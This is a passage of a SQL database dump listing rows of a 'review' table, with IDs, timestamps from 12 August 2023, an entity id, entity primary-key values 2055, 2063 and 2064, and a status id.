(1058, '2023-08-12 12:51:04', 1, 2055, 2),
(1059, '2023-08-12 12:51:09', 1, 2055, 2),
(1060, '2023-08-12 12:51:14', 1, 2055, 2),
(1061, '2023-08-12 12:51:18', 1, 2055, 2),
(1062, '2023-08-12 12:51:22', 1, 2055, 2),
(1063, '2023-08-12 12:51:26', 1, 2055, 2),
(1064, '2023-08-12 12:51:27', 1, 2055, 2),
(1065, '2023-08-12 12:51:32', 1, 2055, 2),
(1066, '2023-08-12 12:51:33', 1, 2055, 2),
(1067, '2023-08-12 12:51:35', 1, 2055, 2),
(1068, '2023-08-12 12:51:36', 1, 2055, 2),
(1069, '2023-08-12 12:51:37', 1, 2055, 2),
(1070, '2023-08-12 12:51:40', 1, 2055, 2),
(1071, '2023-08-12 13:29:35', 1, 2055, 2),
(1072, '2023-08-12 13:31:40', 1, 2055, 2),
(1073, '2023-08-12 13:31:42', 1, 2055, 2),
(1074, '2023-08-12 13:31:47', 1, 2055, 2),
(1075, '2023-08-12 13:31:48', 1, 2055, 2),
(1076, '2023-08-12 13:31:49', 1, 2055, 2),
(1077, '2023-08-12 13:31:52', 1, 2055, 2),
(1078, '2023-08-12 13:31:53', 1, 2055, 2),
(1079, '2023-08-12 13:31:54', 1, 2055, 2),
(1080, '2023-08-12 13:31:55', 1, 2055, 2),
(1081, '2023-08-12 13:31:57', 1, 2055, 2),
(1082, '2023-08-12 13:31:59', 1, 2055, 2),
(1083, '2023-08-12 13:32:00', 1, 2055, 2),
(1084, '2023-08-12 13:32:01', 1, 2055, 2),
(1085, '2023-08-12 13:32:06', 1, 2055, 2),
(1086, '2023-08-12 13:32:08', 1, 2055, 2),
(1087, '2023-08-12 13:32:10', 1, 2055, 2),
(1088, '2023-08-12 13:32:15', 1, 2055, 2),
(1089, '2023-08-12 13:32:20', 1, 2055, 2),
(1090, '2023-08-12 13:32:29', 1, 2055, 2),
(1091, '2023-08-12 13:32:34', 1, 2055, 2),
(1092, '2023-08-12 13:32:41', 1, 2055, 2),
(1093, '2023-08-12 13:32:47', 1, 2055, 2),
(1094, '2023-08-12 13:32:52', 1, 2055, 2),
(1095, '2023-08-12 13:32:58', 1, 2055, 2),
(1096, '2023-08-12 13:32:59', 1, 2055, 2),
(1097, '2023-08-12 13:33:01', 1, 2055, 2),
(1098, '2023-08-12 13:33:02', 1, 2055, 2),
(1099, '2023-08-12 13:33:03', 1, 2055, 2),
(1100, '2023-08-12 13:33:05', 1, 2055, 2),
(1101, '2023-08-12 13:33:34', 1, 2055, 2),
(1102, '2023-08-12 13:33:35', 1, 2055, 2),
(1103, '2023-08-12 13:33:38', 1, 2055, 2),
(1104, '2023-08-12 13:33:39', 1, 2055, 2),
(1105, '2023-08-12 13:33:41', 1, 2055, 2),
(1106, '2023-08-12 13:33:42', 1, 2055, 2),
(1107, '2023-08-12 13:33:43', 1, 2055, 2),
(1108, '2023-08-12 13:33:46', 1, 2055, 2),
(1109, '2023-08-12 13:33:47', 1, 2055, 2),
(1110, '2023-08-12 13:33:52', 1, 2055, 2),
(1111, '2023-08-12 13:33:54', 1, 2055, 2),
(1112, '2023-08-12 13:33:56', 1, 2055, 2),
(1113, '2023-08-12 13:33:57', 1, 2055, 2),
(1114, '2023-08-12 13:33:59', 1, 2055, 2),
(1115, '2023-08-12 13:34:04', 1, 2055, 2),
(1116, '2023-08-12 13:34:07', 1, 2055, 2),
(1117, '2023-08-12 13:34:09', 1, 2064, 2),
(1118, '2023-08-12 13:34:15', 1, 2055, 2),
(1119, '2023-08-12 13:34:21', 1, 2055, 2),
(1120, '2023-08-12 13:34:22', 1, 2055, 2),
(1121, '2023-08-12 13:34:23', 1, 2055, 2),
(1122, '2023-08-12 13:34:25', 1, 2055, 2),
(1123, '2023-08-12 13:34:26', 1, 2055, 2),
(1124, '2023-08-12 13:34:27', 1, 2055, 2),
(1125, '2023-08-12 13:34:32', 1, 2055, 2),
(1126, '2023-08-12 13:34:34', 1, 2055, 2),
(1127, '2023-08-12 13:34:35', 1, 2055, 2),
(1128, '2023-08-12 13:34:37', 1, 2055, 2),
(1129, '2023-08-12 13:34:38', 1, 2055, 2),
(1130, '2023-08-12 13:34:40', 1, 2055, 2),
(1131, '2023-08-12 13:34:42', 1, 2055, 2),
(1132, '2023-08-12 13:34:47', 1, 2055, 2),
(1133, '2023-08-12 13:34:48', 1, 2055, 2),
(1134, '2023-08-12 13:34:49', 1, 2055, 2),
(1135, '2023-08-12 13:34:50', 1, 2055, 2),
(1136, '2023-08-12 13:34:50', 1, 2055, 2),
(1137, '2023-08-12 13:34:52', 1, 2055, 2),
(1138, '2023-08-12 13:34:54', 1, 2055, 2),
(1139, '2023-08-12 13:34:58', 1, 2055, 2),
(1140, '2023-08-12 13:35:02', 1, 2055, 2),
(1141, '2023-08-12 13:35:04', 1, 2055, 2),
(1142, '2023-08-12 13:35:05', 1, 2055, 2),
(1143, '2023-08-12 13:35:07', 1, 2055, 2),
(1144, '2023-08-12 13:35:11', 1, 2055, 2),
(1145, '2023-08-12 13:35:17', 1, 2055, 2),
(1146, '2023-08-12 13:35:23', 1, 2055, 2),
(1147, '2023-08-12 13:35:25', 1, 2055, 2),
(1148, '2023-08-12 13:35:26', 1, 2055, 2),
(1149, '2023-08-12 13:35:28', 1, 2055, 2),
(1150, '2023-08-12 13:35:30', 1, 2055, 2),
(1151, '2023-08-12 13:35:32', 1, 2055, 2),
(1152, '2023-08-12 13:35:41', 1, 2055, 2),
(1153, '2023-08-12 13:35:42', 1, 2055, 2),
(1154, '2023-08-12 13:35:45', 1, 2055, 2),
(1155, '2023-08-12 13:35:46', 1, 2064, 2),
(1156, '2023-08-12 13:35:48', 1, 2055, 2),
(1157, '2023-08-12 13:35:50', 1, 2064, 2),
(1158, '2023-08-12 13:35:55', 1, 2055, 2),
(1159, '2023-08-12 13:35:56', 1, 2064, 2),
(1160, '2023-08-12 13:35:58', 1, 2064, 2),
(1161, '2023-08-12 13:35:59', 1, 2064, 2),
(1162, '2023-08-12 13:36:00', 1, 2055, 2),
(1163, '2023-08-12 13:36:01', 1, 2064, 2),
(1164, '2023-08-12 13:36:02', 1, 2064, 2),
(1165, '2023-08-12 13:36:03', 1, 2055, 2),
(1166, '2023-08-12 13:36:03', 1, 2064, 2),
(1167, '2023-08-12 13:36:05', 1, 2055, 2),
(1168, '2023-08-12 13:36:07', 1, 2064, 2),
(1169, '2023-08-12 13:36:11', 1, 2055, 2),
(1170, '2023-08-12 13:36:12', 1, 2064, 2),
(1171, '2023-08-12 13:36:16', 1, 2055, 2),
(1172, '2023-08-12 13:36:18', 1, 2064, 2),
(1173, '2023-08-12 13:36:19', 1, 2055, 2),
(1174, '2023-08-12 13:36:20', 1, 2055, 2),
(1175, '2023-08-12 13:36:21', 1, 2055, 2),
(1176, '2023-08-12 13:36:22', 1, 2064, 2),
(1177, '2023-08-12 13:36:29', 1, 2064, 2),
(1178, '2023-08-12 13:36:32', 1, 2064, 2),
(1179, '2023-08-12 13:36:37', 1, 2064, 2),
(1180, '2023-08-12 13:36:41', 1, 2064, 2),
(1181, '2023-08-12 13:36:45', 1, 2064, 2),
(1182, '2023-08-12 13:36:49', 1, 2064, 2),
(1183, '2023-08-12 13:36:55', 1, 2064, 2),
(1184, '2023-08-12 13:37:02', 1, 2064, 2),
(1185, '2023-08-12 13:37:07', 1, 2064, 2),
(1186, '2023-08-12 13:37:10', 1, 2064, 2),
(1187, '2023-08-12 13:37:16', 1, 2064, 2),
(1188, '2023-08-12 13:37:24', 1, 2064, 2),
(1189, '2023-08-12 13:37:26', 1, 2064, 2),
(1190, '2023-08-12 13:37:27', 1, 2064, 2),
(1191, '2023-08-12 13:37:29', 1, 2064, 2),
(1192, '2023-08-12 13:37:30', 1, 2064, 2),
(1193, '2023-08-12 13:37:35', 1, 2064, 2),
(1194, '2023-08-12 13:38:42', 1, 2064, 2),
(1195, '2023-08-12 13:38:43', 1, 2064, 2),
(1196, '2023-08-12 13:38:46', 1, 2064, 2),
(1197, '2023-08-12 13:38:51', 1, 2064, 2),
(1198, '2023-08-12 13:38:53', 1, 2064, 2),
(1199, '2023-08-12 13:38:56', 1, 2064, 2),
(1200, '2023-08-12 13:38:57', 1, 2064, 2),
(1201, '2023-08-12 13:39:01', 1, 2064, 2),
(1202, '2023-08-12 13:39:04', 1, 2064, 2),
(1203, '2023-08-12 13:39:07', 1, 2064, 2),
(1204, '2023-08-12 13:39:09', 1, 2064, 2),
(1205, '2023-08-12 13:39:14', 1, 2064, 2),
(1206, '2023-08-12 13:39:21', 1, 2064, 2),
(1207, '2023-08-12 13:39:24', 1, 2064, 2),
(1208, '2023-08-12 13:39:26', 1, 2064, 2),
(1209, '2023-08-12 13:39:30', 1, 2064, 2),
(1210, '2023-08-12 13:39:31', 1, 2064, 2),
(1211, '2023-08-12 13:39:32', 1, 2064, 2),
(1212, '2023-08-12 13:39:34', 1, 2064, 2),
(1213, '2023-08-12 13:39:36', 1, 2064, 2),
(1214, '2023-08-12 13:39:39', 1, 2064, 2),
(1215, '2023-08-12 13:39:42', 1, 2064, 2),
(1216, '2023-08-12 13:39:46', 1, 2064, 2),
(1217, '2023-08-12 13:39:51', 1, 2064, 2),
(1218, '2023-08-12 13:39:55', 1, 2064, 2),
(1219, '2023-08-12 13:39:58', 1, 2064, 2),
(1220, '2023-08-12 13:40:03', 1, 2064, 2),
(1221, '2023-08-12 13:40:05', 1, 2064, 2),
(1222, '2023-08-12 13:40:07', 1, 2064, 2),
(1223, '2023-08-12 13:40:08', 1, 2064, 2),
(1224, '2023-08-12 13:40:10', 1, 2064, 2),
(1225, '2023-08-12 13:40:11', 1, 2064, 2),
(1226, '2023-08-12 13:40:14', 1, 2064, 2),
(1227, '2023-08-12 13:40:17', 1, 2064, 2),
(1228, '2023-08-12 13:40:20', 1, 2064, 2),
(1229, '2023-08-12 13:40:21', 1, 2064, 2),
(1230, '2023-08-12 13:40:23', 1, 2064, 2),
(1231, '2023-08-12 13:40:25', 1, 2064, 2),
(1232, '2023-08-12 13:40:28', 1, 2064, 2),
(1233, '2023-08-12 13:40:30', 1, 2064, 2),
(1234, '2023-08-12 13:40:35', 1, 2064, 2),
(1235, '2023-08-12 13:40:36', 1, 2064, 2),
(1236, '2023-08-12 13:40:38', 1, 2064, 2),
(1237, '2023-08-12 13:40:39', 1, 2064, 2),
(1238, '2023-08-12 13:40:41', 1, 2064, 2),
(1239, '2023-08-12 13:40:43', 1, 2064, 2),
(1240, '2023-08-12 13:40:44', 1, 2064, 2),
(1241, '2023-08-12 13:40:46', 1, 2064, 2),
(1242, '2023-08-12 13:40:49', 1, 2064, 2),
(1243, '2023-08-12 13:40:52', 1, 2064, 2),
(1244, '2023-08-12 13:40:58', 1, 2064, 2),
(1245, '2023-08-12 13:41:00', 1, 2064, 2),
(1246, '2023-08-12 13:41:03', 1, 2064, 2),
(1247, '2023-08-12 13:41:12', 1, 2064, 2),
(1248, '2023-08-12 13:41:21', 1, 2064, 2),
(1249, '2023-08-12 13:41:30', 1, 2064, 2),
(1250, '2023-08-12 13:41:32', 1, 2064, 2),
(1251, '2023-08-12 13:41:33', 1, 2064, 2),
(1252, '2023-08-12 13:41:35', 1, 2064, 2),
(1253, '2023-08-12 13:41:38', 1, 2064, 2),
(1254, '2023-08-12 13:41:39', 1, 2064, 2),
(1255, '2023-08-12 13:41:40', 1, 2064, 2),
(1256, '2023-08-12 13:41:42', 1, 2064, 2),
(1257, '2023-08-12 13:41:44', 1, 2064, 2),
(1258, '2023-08-12 13:41:49', 1, 2064, 2),
(1259, '2023-08-12 13:41:51', 1, 2064, 2),
(1260, '2023-08-12 13:41:52', 1, 2064, 2),
(1261, '2023-08-12 13:41:56', 1, 2064, 2),
(1262, '2023-08-12 13:41:59', 1, 2064, 2),
(1263, '2023-08-12 13:42:01', 1, 2064, 2),
(1264, '2023-08-12 13:42:05', 1, 2064, 2),
(1265, '2023-08-12 13:42:08', 1, 2064, 2),
(1266, '2023-08-12 13:42:12', 1, 2064, 2),
(1267, '2023-08-12 13:42:16', 1, 2064, 2),
(1268, '2023-08-12 13:42:23', 1, 2064, 2),
(1269, '2023-08-12 13:42:25', 1, 2064, 2),
(1270, '2023-08-12 13:42:25', 1, 2064, 2),
(1271, '2023-08-12 13:42:30', 1, 2064, 2),
(1272, '2023-08-12 13:42:31', 1, 2064, 2),
(1273, '2023-08-12 13:42:32', 1, 2064, 2),
(1274, '2023-08-12 13:42:34', 1, 2064, 2),
(1275, '2023-08-12 13:42:41', 1, 2064, 2),
(1276, '2023-08-12 13:42:47', 1, 2064, 2),
(1277, '2023-08-12 13:42:52', 1, 2064, 2),
(1278, '2023-08-12 13:42:54', 1, 2064, 2),
(1279, '2023-08-12 13:42:56', 1, 2064, 2),
(1280, '2023-08-12 13:42:57', 1, 2064, 2),
(1281, '2023-08-12 13:42:59', 1, 2064, 2),
(1282, '2023-08-12 13:43:00', 1, 2064, 2),
(1283, '2023-08-12 13:43:02', 1, 2064, 2),
(1284, '2023-08-12 13:43:07', 1, 2064, 2),
(1285, '2023-08-12 13:43:09', 1, 2064, 2),
(1286, '2023-08-12 13:43:10', 1, 2064, 2),
(1287, '2023-08-12 13:43:12', 1, 2064, 2),
(1288, '2023-08-12 13:43:13', 1, 2064, 2),
(1289, '2023-08-12 13:43:14', 1, 2064, 2),
(1290, '2023-08-12 13:43:16', 1, 2064, 2),
(1291, '2023-08-12 13:43:17', 1, 2064, 2),
(1292, '2023-08-12 13:43:20', 1, 2064, 2),
(1293, '2023-08-12 13:43:26', 1, 2064, 2),
(1294, '2023-08-12 13:43:35', 1, 2064, 2),
(1295, '2023-08-12 13:43:39', 1, 2064, 2),
(1296, '2023-08-12 13:43:43', 1, 2064, 2),
(1297, '2023-08-12 13:43:49', 1, 2064, 2),
(1298, '2023-08-12 13:43:58', 1, 2064, 2),
(1299, '2023-08-12 13:43:59', 1, 2064, 2),
(1300, '2023-08-12 13:44:00', 1, 2064, 2),
(1301, '2023-08-12 13:44:02', 1, 2064, 2),
(1302, '2023-08-12 13:44:08', 1, 2064, 2),
(1303, '2023-08-12 13:44:13', 1, 2064, 2),
(1304, '2023-08-12 13:44:53', 1, 2064, 2),
(1305, '2023-08-12 13:44:56', 1, 2064, 2),
(1306, '2023-08-12 13:44:57', 1, 2064, 2),
(1307, '2023-08-12 13:44:58', 1, 2064, 2),
(1308, '2023-08-12 13:44:59', 1, 2064, 2),
(1309, '2023-08-12 13:45:00', 1, 2064, 2),
(1310, '2023-08-12 13:45:02', 1, 2064, 2),
(1311, '2023-08-12 13:45:03', 1, 2064, 2),
(1312, '2023-08-12 13:45:06', 1, 2064, 2),
(1313, '2023-08-12 13:45:08', 1, 2064, 2),
(1314, '2023-08-12 13:45:10', 1, 2064, 2),
(1315, '2023-08-12 13:45:12', 1, 2064, 2),
(1316, '2023-08-12 13:45:14', 1, 2064, 2),
(1317, '2023-08-12 13:45:16', 1, 2064, 2),
(1318, '2023-08-12 13:45:19', 1, 2064, 2),
(1319, '2023-08-12 13:45:21', 1, 2064, 2),
(1320, '2023-08-12 13:45:24', 1, 2064, 2),
(1321, '2023-08-12 13:45:28', 1, 2064, 2),
(1322, '2023-08-12 13:45:30', 1, 2064, 2),
(1323, '2023-08-12 13:45:32', 1, 2064, 2),
(1324, '2023-08-12 13:45:33', 1, 2064, 2),
(1325, '2023-08-12 13:45:35', 1, 2064, 2),
(1326, '2023-08-12 13:45:40', 1, 2064, 2),
(1327, '2023-08-12 13:45:43', 1, 2064, 2),
(1328, '2023-08-12 13:45:44', 1, 2064, 2),
(1329, '2023-08-12 13:45:46', 1, 2064, 2),
(1330, '2023-08-12 13:45:48', 1, 2064, 2),
(1331, '2023-08-12 13:45:50', 1, 2064, 2),
(1332, '2023-08-12 13:45:51', 1, 2064, 2),
(1333, '2023-08-12 13:45:54', 1, 2064, 2),
(1334, '2023-08-12 13:45:59', 1, 2064, 2),
(1335, '2023-08-12 13:46:05', 1, 2064, 2),
(1336, '2023-08-12 13:46:09', 1, 2064, 2),
(1337, '2023-08-12 13:46:13', 1, 2064, 2),
(1338, '2023-08-12 13:46:18', 1, 2064, 2),
(1339, '2023-08-12 13:46:21', 1, 2064, 2),
(1340, '2023-08-12 13:46:27', 1, 2064, 2),
(1341, '2023-08-12 13:46:33', 1, 2064, 2),
(1342, '2023-08-12 13:46:40', 1, 2064, 2),
(1343, '2023-08-12 13:46:42', 1, 2064, 2),
(1344, '2023-08-12 13:46:43', 1, 2064, 2),
(1345, '2023-08-12 13:46:44', 1, 2064, 2),
(1346, '2023-08-12 13:46:56', 1, 2064, 2),
(1347, '2023-08-12 13:47:01', 1, 2064, 2),
(1348, '2023-08-12 13:47:04', 1, 2064, 2),
(1349, '2023-08-12 13:47:05', 1, 2064, 2),
(1350, '2023-08-12 13:47:06', 1, 2064, 2),
(1351, '2023-08-12 13:47:07', 1, 2064, 2),
(1352, '2023-08-12 13:47:10', 1, 2064, 2),
(1353, '2023-08-12 13:47:16', 1, 2064, 2),
(1354, '2023-08-12 13:47:18', 1, 2064, 2),
(1355, '2023-08-12 13:47:21', 1, 2064, 2),
(1356, '2023-08-12 13:47:24', 1, 2064, 2),
(1357, '2023-08-12 13:47:27', 1, 2064, 2),
(1358, '2023-08-12 13:47:34', 1, 2064, 2),
(1359, '2023-08-12 13:47:36', 1, 2064, 2),
(1360, '2023-08-12 13:47:39', 1, 2064, 2),
(1361, '2023-08-12 13:47:44', 1, 2064, 2),
(1362, '2023-08-12 13:47:51', 1, 2064, 2),
(1363, '2023-08-12 13:47:56', 1, 2064, 2),
(1364, '2023-08-12 13:47:58', 1, 2064, 2),
(1365, '2023-08-12 13:47:59', 1, 2064, 2),
(1366, '2023-08-12 13:48:00', 1, 2064, 2),
(1367, '2023-08-12 13:50:26', 1, 2064, 2),
(1368, '2023-08-12 13:51:13', 1, 2064, 2),
(1369, '2023-08-12 13:51:16', 1, 2064, 2),
(1370, '2023-08-12 13:51:19', 1, 2064, 2),
(1371, '2023-08-12 13:51:20', 1, 2064, 2),
(1372, '2023-08-12 13:51:23', 1, 2064, 2),
(1373, '2023-08-12 13:51:25', 1, 2064, 2),
(1374, '2023-08-12 13:51:27', 1, 2064, 2),
(1375, '2023-08-12 13:51:29', 1, 2064, 2),
(1376, '2023-08-12 13:51:34', 1, 2064, 2),
(1377, '2023-08-12 13:51:37', 1, 2064, 2),
(1378, '2023-08-12 13:51:43', 1, 2064, 2),
(1379, '2023-08-12 13:51:47', 1, 2064, 2),
(1380, '2023-08-12 13:51:50', 1, 2064, 2),
(1381, '2023-08-12 13:51:52', 1, 2064, 2),
(1382, '2023-08-12 13:51:55', 1, 2064, 2),
(1383, '2023-08-12 13:51:57', 1, 2064, 2),
(1384, '2023-08-12 13:51:58', 1, 2064, 2),
(1385, '2023-08-12 13:52:04', 1, 2064, 2),
(1386, '2023-08-12 13:52:07', 1, 2064, 2),
(1387, '2023-08-12 13:52:12', 1, 2064, 2),
(1388, '2023-08-12 13:52:15', 1, 2064, 2),
(1389, '2023-08-12 13:52:18', 1, 2064, 2),
(1390, '2023-08-12 13:52:24', 1, 2064, 2),
(1391, '2023-08-12 13:52:31', 1, 2064, 2),
(1392, '2023-08-12 13:52:32', 1, 2064, 2),
(1393, '2023-08-12 13:52:34', 1, 2064, 2),
(1394, '2023-08-12 13:52:35', 1, 2064, 2),
(1395, '2023-08-12 13:52:40', 1, 2064, 2),
(1396, '2023-08-12 13:52:46', 1, 2064, 2),
(1397, '2023-08-12 13:53:42', 1, 2064, 2),
(1398, '2023-08-12 13:53:44', 1, 2064, 2),
(1399, '2023-08-12 13:53:49', 1, 2064, 2),
(1400, '2023-08-12 13:53:52', 1, 2064, 2),
(1401, '2023-08-12 13:53:54', 1, 2064, 2),
(1402, '2023-08-12 13:53:57', 1, 2064, 2),
(1403, '2023-08-12 13:53:58', 1, 2064, 2),
(1404, '2023-08-12 13:54:01', 1, 2064, 2),
(1405, '2023-08-12 13:54:05', 1, 2064, 2),
(1406, '2023-08-12 13:54:08', 1, 2064, 2),
(1407, '2023-08-12 13:54:13', 1, 2064, 2),
(1408, '2023-08-12 13:54:19', 1, 2064, 2),
(1409, '2023-08-12 13:54:24', 1, 2064, 2),
(1410, '2023-08-12 13:54:28', 1, 2064, 2),
(1411, '2023-08-12 13:54:34', 1, 2064, 2),
(1412, '2023-08-12 13:54:42', 1, 2064, 2),
(1413, '2023-08-12 13:54:46', 1, 2064, 2),
(1414, '2023-08-12 13:54:49', 1, 2064, 2),
(1415, '2023-08-12 13:54:51', 1, 2064, 2),
(1416, '2023-08-12 13:54:52', 1, 2064, 2),
(1417, '2023-08-12 13:54:54', 1, 2064, 2),
(1418, '2023-08-12 13:54:58', 1, 2064, 2),
(1419, '2023-08-12 13:55:03', 1, 2064, 2),
(1420, '2023-08-12 13:55:06', 1, 2064, 2),
(1421, '2023-08-12 13:55:07', 1, 2064, 2),
(1422, '2023-08-12 13:55:08', 1, 2064, 2),
(1423, '2023-08-12 13:55:10', 1, 2064, 2),
(1424, '2023-08-12 13:55:12', 1, 2064, 2),
(1425, '2023-08-12 13:55:15', 1, 2064, 2),
(1426, '2023-08-12 13:55:20', 1, 2064, 2),
(1427, '2023-08-12 13:55:25', 1, 2064, 2),
(1428, '2023-08-12 13:55:31', 1, 2064, 2),
(1429, '2023-08-12 13:55:35', 1, 2064, 2),
(1430, '2023-08-12 13:55:42', 1, 2064, 2),
(1431, '2023-08-12 13:55:50', 1, 2064, 2),
(1432, '2023-08-12 13:55:57', 1, 2064, 2),
(1433, '2023-08-12 13:56:04', 1, 2064, 2),
(1434, '2023-08-12 13:56:10', 1, 2064, 2),
(1435, '2023-08-12 13:56:13', 1, 2064, 2),
(1436, '2023-08-12 13:56:14', 1, 2064, 2),
(1437, '2023-08-12 13:56:16', 1, 2064, 2),
(1438, '2023-08-12 13:56:17', 1, 2064, 2),
(1439, '2023-08-12 13:56:20', 1, 2064, 2),
(1440, '2023-08-12 13:56:24', 1, 2064, 2),
(1441, '2023-08-12 13:56:27', 1, 2064, 2),
(1442, '2023-08-12 13:56:29', 1, 2064, 2),
(1443, '2023-08-12 13:56:31', 1, 2064, 2),
(1444, '2023-08-12 13:56:32', 1, 2064, 2),
(1445, '2023-08-12 13:56:33', 1, 2064, 2),
(1446, '2023-08-12 13:56:34', 1, 2064, 2),
(1447, '2023-08-12 13:56:37', 1, 2064, 2),
(1448, '2023-08-12 13:56:38', 1, 2064, 2),
(1449, '2023-08-12 13:56:40', 1, 2064, 2),
(1450, '2023-08-12 13:56:42', 1, 2064, 2),
(1451, '2023-08-12 13:56:45', 1, 2064, 2),
(1452, '2023-08-12 13:56:48', 1, 2064, 2),
(1453, '2023-08-12 13:56:49', 1, 2064, 2),
(1454, '2023-08-12 13:56:51', 1, 2064, 2),
(1455, '2023-08-12 13:56:53', 1, 2064, 2),
(1456, '2023-08-12 13:56:56', 1, 2063, 2),
(1457, '2023-08-12 13:57:05', 1, 2064, 2),
(1458, '2023-08-12 13:57:06', 1, 2064, 2),
(1459, '2023-08-12 13:57:08', 1, 2064, 2),
(1460, '2023-08-12 13:57:09', 1, 2064, 2),
(1461, '2023-08-12 13:57:18', 1, 2063, 2),
(1462, '2023-08-12 13:57:23', 1, 2063, 2),
(1463, '2023-08-12 13:57:27', 1, 2063, 2),
(1464, '2023-08-12 13:57:32', 1, 2063, 2),
(1465, '2023-08-12 13:57:36', 1, 2063, 2),
(1466, '2023-08-12 13:57:39', 1, 2063, 2),
(1467, '2023-08-12 13:57:41', 1, 2063, 2),
(1468, '2023-08-12 13:57:44', 1, 2063, 2),
(1469, '2023-08-12 13:57:47', 1, 2063, 2),
(1470, '2023-08-12 13:57:56', 1, 2063, 2),
(1471, '2023-08-12 13:58:09', 1, 2063, 2),
(1472, '2023-08-12 13:58:19', 1, 2063, 2),
(1473, '2023-08-12 13:58:25', 1, 2063, 2),
(1474, '2023-08-12 13:58:31', 1, 2063, 2),
(1475, '2023-08-12 13:58:37', 1, 2063, 2),
(1476, '2023-08-12 13:58:44', 1, 2063, 2),
(1477, '2023-08-12 13:58:50', 1, 2063, 2),
(1478, '2023-08-12 13:59:00', 1, 2063, 2),
(1479, '2023-08-12 13:59:07', 1, 2063, 2),
(1480, '2023-08-12 13:59:14', 1, 2063, 2),
(1481, '2023-08-12 13:59:17', 1, 2063, 2),
(1482, '2023-08-12 13:59:20', 1, 2063, 2),
(1483, '2023-08-12 13:59:25', 1, 2063, 2),
(1484, '2023-08-12 13:59:30', 1, 2063, 2),
(1485, '2023-08-12 13:59:38', 1, 2063, 2),
(1486, '2023-08-12 13:59:41', 1, 2063, 2),
(1487, '2023-08-12 13:59:49', 1, 2063, 2),
(1488, '2023-08-12 13:59:51', 1, 2063, 2),
(1489, '2023-08-12 13:59:53', 1, 2063, 2),
(1490, '2023-08-12 14:01:37', 1, 2063, 2),
(1491, '2023-08-12 14:01:45', 1, 2063, 2),
(1492, '2023-08-12 14:01:49', 1, 2063, 2),
(1493, '2023-08-12 14:01:50', 1, 2063, 2),
(1494, '2023-08-12 14:01:52', 1, 2063, 2),
(1495, '2023-08-12 14:01:53', 1, 2063, 2),
(1496, '2023-08-12 14:01:54', 1, 2063, 2),
(1497, '2023-08-12 14:01:55', 1, 2063, 2),
(1498, '2023-08-12 14:02:06', 1, 2063, 2),
(1499, '2023-08-12 14:02:14', 1, 2063, 2),
(1500, '2023-08-12 14:02:17', 1, 2063, 2),
(1501, '2023-08-12 14:02:23', 1, 2063, 2),
(1502, '2023-08-12 14:02:27', 1, 2063, 2),
(1503, '2023-08-12 14:02:31', 1, 2063, 2),
(1504, '2023-08-12 14:02:34', 1, 2063, 2),
(1505, '2023-08-12 14:02:37', 1, 2063, 2),
(1506, '2023-08-12 14:02:41', 1, 2063, 2),
(1507, '2023-08-12 14:02:46', 1, 2063, 2),
(1508, '2023-08-12 14:02:52', 1, 2063, 2),
(1509, '2023-08-12 14:02:55', 1, 2063, 2),
(1510, '2023-08-12 14:02:59', 1, 2063, 2),
(1511, '2023-08-12 14:03:04', 1, 2063, 2),
(1512, '2023-08-12 14:03:16', 1, 2063, 2),
(1513, '2023-08-12 14:03:19', 1, 2063, 2),
(1514, '2023-08-12 14:03:27', 1, 2063, 2),
(1515, '2023-08-12 14:03:31', 1, 2063, 2),
(1516, '2023-08-12 14:03:35', 1, 2063, 2),
(1517, '2023-08-12 14:03:38', 1, 2063, 2),
(1518, '2023-08-12 14:03:41', 1, 2063, 2),
(1519, '2023-08-12 14:03:43', 1, 2063, 2),
(1520, '2023-08-12 14:03:47', 1, 2063, 2),
(1521, '2023-08-12 14:03:49', 1, 2063, 2),
(1522, '2023-08-12 14:03:55', 1, 2063, 2),
(1523, '2023-08-12 14:04:05', 1, 2063, 2),
(1524, '2023-08-12 14:04:12', 1, 2063, 2),
(1525, '2023-08-12 14:04:17', 1, 2063, 2),
(1526, '2023-08-12 14:04:19', 1, 2063, 2),
(1527, '2023-08-12 14:04:27', 1, 2063, 2),
(1528, '2023-08-12 14:04:29', 1, 2063, 2),
(1529, '2023-08-12 14:04:34', 1, 2063, 2),
(1530, '2023-08-12 14:04:40', 1, 2063, 2),
(1531, '2023-08-12 14:04:47', 1, 2063, 2),
(1532, '2023-08-12 14:04:53', 1, 2063, 2),
(1533, '2023-08-12 14:05:05', 1, 2063, 2),
(1534, '2023-08-12 14:05:14', 1, 2063, 2),
(1535, '2023-08-12 14:05:20', 1, 2063, 2),
(1536, '2023-08-12 14:05:29', 1, 2063, 2),
(1537, '2023-08-12 14:05:38', 1, 2063, 2),
(1538, '2023-08-12 14:05:56', 1, 2063, 2),
(1539, '2023-08-12 14:06:05', 1, 2063, 2),
(1540, '2023-08-12 14:06:15', 1, 2063, 2),
(1541, '2023-08-12 14:06:21', 1, 2063, 2),
(1542, '2023-08-12 14:06:26', 1, 2063, 2),
(1543, '2023-08-12 14:06:33', 1, 2063, 2),
(1544, '2023-08-12 14:06:39', 1, 2063, 2),
(1545, '2023-08-12 14:06:43', 1, 2063, 2);
INSERT INTO `review` (`review_id`, `created_at`, `entity_id`, `entity_pk_value`, `status_id`) VALUES
(1546, '2023-08-12 14:06:46', 1, 2063, 2),
(1547, '2023-08-12 14:06:54', 1, 2063, 2),
(1548, '2023-08-12 14:06:58', 1, 2063, 2),
(1549, '2023-08-12 14:07:03', 1, 2063, 2),
(1550, '2023-08-12 14:07:06', 1, 2063, 2),
(1551, '2023-08-12 14:07:13', 1, 2063, 2),
(1552, '2023-08-12 14:07:18', 1, 2063, 2),
(1553, '2023-08-12 14:07:25', 1, 2063, 2),
(1554, '2023-08-12 14:07:34', 1, 2063, 2),
(1555, '2023-08-12 14:07:41', 1, 2063, 2),
(1556, '2023-08-12 14:07:47', 1, 2063, 2),
(1557, '2023-08-12 14:07:49', 1, 2063, 2),
(1558, '2023-08-12 14:07:51', 1, 2063, 2),
(1559, '2023-08-12 14:07:59', 1, 2063, 2),
(1560, '2023-08-12 14:08:06', 1, 2063, 2),
(1561, '2023-08-12 14:08:10', 1, 2063, 2),
(1562, '2023-08-12 14:08:12', 1, 2063, 2),
(1563, '2023-08-12 14:08:18', 1, 2063, 2),
(1564, '2023-08-12 15:28:58', 1, 2063, 2),
(1565, '2023-08-12 15:29:39', 1, 2063, 2),
(1566, '2023-08-12 15:29:45', 1, 2063, 2),
(1567, '2023-08-12 15:29:49', 1, 2063, 2),
(1568, '2023-08-12 15:29:52', 1, 2063, 2),
(1569, '2023-08-12 15:29:53', 1, 2063, 2),
(1570, '2023-08-12 15:29:55', 1, 2063, 2),
(1571, '2023-08-12 15:29:58', 1, 2063, 2),
(1572, '2023-08-12 15:30:02', 1, 2063, 2),
